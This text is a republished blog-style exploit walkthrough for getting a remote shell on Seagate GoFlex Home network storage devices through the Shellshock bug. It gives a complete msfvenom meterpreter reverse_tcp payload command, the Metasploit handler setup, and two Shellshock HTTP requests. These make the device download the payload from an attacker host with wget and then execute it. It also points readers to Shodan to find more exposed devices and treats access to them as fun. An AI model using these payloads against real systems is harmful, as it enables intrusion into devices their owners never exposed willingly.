Seagate GoFlex Remote Shell

`I have been scanning some ranges in my free time and came across a Seagate  
GoFlex Home Network Storage System which my scanner flagged as being  
vulnerable to shellshock but getting a remote shell was no easy task "for  
me anyway". I ended up having to build a payload with msfvenom and doing  
the execution using burp suite and handling the shell with metasploit  
handler. The best part is this device uses UPNP to tunnel to the Internet,  
giving us easy access >;)  
  
Start with the payload:  
  
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt  
  
  
Now upload msf.txt to your web server. After the payload is uploaded open  
metasploit and  
  
use exploit/multi/handler  
> set payload php/meterpreter/reverse_tcp  
> run  
  
  
That should start up our listener. Now we need to open up burp and use the  
repeater. Enter the following for the request:  
  
GET /support/ HTTP/1.1  
> Host: 5.6.7.8  
> User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;  
> PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget  
> http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Connection: keep-alive  
  
  
Also don't forget to configure the target correctly. Hit go and wait a few  
seconds and you should see some wget output and if all went well you should  
now have uploaded msf.php to the /tmp/ dir of the device. Now we just need  
to execute it. For this we use burp again. This time put this in the  
request:  
  
GET /support/ HTTP/1.1  
> Host: 5.6.7.8  
> User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;  
> PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Connection: keep-alive  
  
  
This time when you hit Go, and your ports are forwarded correctly, you  
should be able to go back to our msfconsole window and see a session has  
opened. You wont have root at this point but you can still do a lot of fun  
stuff. You can find some of these devices on Shodan by searching for  
"hipname=". If anyone figures out how to get root please share :) Enjoy!  
  
*Count of vulnerable devices taken from Shodan search results, not actual  
testing.  
**I did not test it but you could try to use linux/x86/exec payload in bash  
bug exploit module to deploy and execute. This would allow you to keep it  
all in metasploit.  
  
Original post -  
http://aahideaway.blogspot.com/2015/11/getting-remote-shell-on-any-one-of.html  
Check it out for more information on this and other posts.  
`